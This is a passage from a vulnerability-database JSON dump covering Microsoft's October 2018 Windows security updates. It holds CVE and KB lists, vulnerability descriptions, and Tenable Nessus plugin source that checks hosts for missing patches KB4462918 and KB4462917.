\n[CVE-2018-8482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8482>)3.1Critical \n[CVE-2018-8506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8506>)5.5Critical \n[CVE-2018-8490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8490>)8.4Critical \n[CVE-2018-8413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8413>)7.8Critical \n[CVE-2018-8329](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8329>)7.8Critical 
\n[CVE-2018-8453](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8453>)7.8Critical \n[CVE-2018-8411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8411>)7.0Critical \n[CVE-2018-8494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8494>)8.8Critical \n[CVE-2018-8495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8495>)7.5Critical \n[CVE-2018-8484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8484>)7.8Critical \n[CVE-2018-8427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8427>)4.7Critical \n[CVE-2018-8489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8489>)8.4Critical \n[CVE-2018-8497](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8497>)0.0Critical\n\n### *KB list*:\n[4462917](<http://support.microsoft.com/kb/4462917>) \n[4463097](<http://support.microsoft.com/kb/4463097>) \n[4462918](<http://support.microsoft.com/kb/4462918>) \n[4462923](<http://support.microsoft.com/kb/4462923>) \n[4462931](<http://support.microsoft.com/kb/4462931>) \n[4462919](<http://support.microsoft.com/kb/4462919>) \n[4464330](<http://support.microsoft.com/kb/4464330>) \n[4462929](<http://support.microsoft.com/kb/4462929>) \n[4462937](<http://support.microsoft.com/kb/4462937>) \n[4462922](<http://support.microsoft.com/kb/4462922>) \n[4462915](<http://support.microsoft.com/kb/4462915>) \n[4462926](<http://support.microsoft.com/kb/4462926>) \n[4462941](<http://support.microsoft.com/kb/4462941>) \n[4463104](<http://support.microsoft.com/kb/4463104>)\n\n### *Microsoft official advisories*:", "modified": "2019-03-07T00:00:00", "published": "2018-10-09T00:00:00", "id": "KLA11333", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11333", "title": "\r KLA11333Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", 
"description": "The remote Windows host is missing security update 4462918.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8509)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. 
An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Information Disclosure vulnerability exists in the\n way that Microsoft Windows Codecs Library handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. Exploitation of the\n vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2018-8506)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2018-8512)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. 
(CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462918.NASL", "href": "https://www.tenable.com/plugins/nessus/117998", "published": "2018-10-09T00:00:00", "title": "KB4462918: Windows 10 Version 1709 and Windows Server Version 1709 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117998);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8320\",\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8490\",\n \"CVE-2018-8491\",\n \"CVE-2018-8492\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8495\",\n \"CVE-2018-8497\",\n \"CVE-2018-8503\",\n \"CVE-2018-8505\",\n \"CVE-2018-8506\",\n \"CVE-2018-8509\",\n \"CVE-2018-8512\",\n \"CVE-2018-8530\"\n );\n script_bugtraq_id(105477, 105478);\n script_xref(name:\"MSKB\", value:\"4462918\");\n script_xref(name:\"MSFT\", value:\"MS18-4462918\");\n\n script_name(english:\"KB4462918: Windows 10 Version 1709 and Windows Server Version 1709 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462918.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. 
An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. 
By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8509)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Information Disclosure vulnerability exists in the\n way that Microsoft Windows Codecs Library handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. Exploitation of the\n vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2018-8506)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2018-8512)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\");\n # https://support.microsoft.com/en-us/help/4462918/windows-10-update-kb4462918\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cb51c9ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462918.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462918');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462918])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462917.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. 
An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. 
If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462917.NASL", "href": "https://www.tenable.com/plugins/nessus/117997", "published": "2018-10-09T00:00:00", "title": "KB4462917: Windows 10 Version 1607 and Windows Server 2016 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117997);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8320\",\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8490\",\n \"CVE-2018-8491\",\n \"CVE-2018-8492\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8495\",\n \"CVE-2018-8497\",\n \"CVE-2018-8503\",\n \"CVE-2018-8505\"\n );\n script_bugtraq_id(105477, 105478);\n script_xref(name:\"MSKB\", value:\"4462917\");\n script_xref(name:\"MSFT\", value:\"MS18-4462917\");\n\n script_name(english:\"KB4462917: Windows 10 Version 1607 and Windows Server 2016 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462917.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. 
By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. 
An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 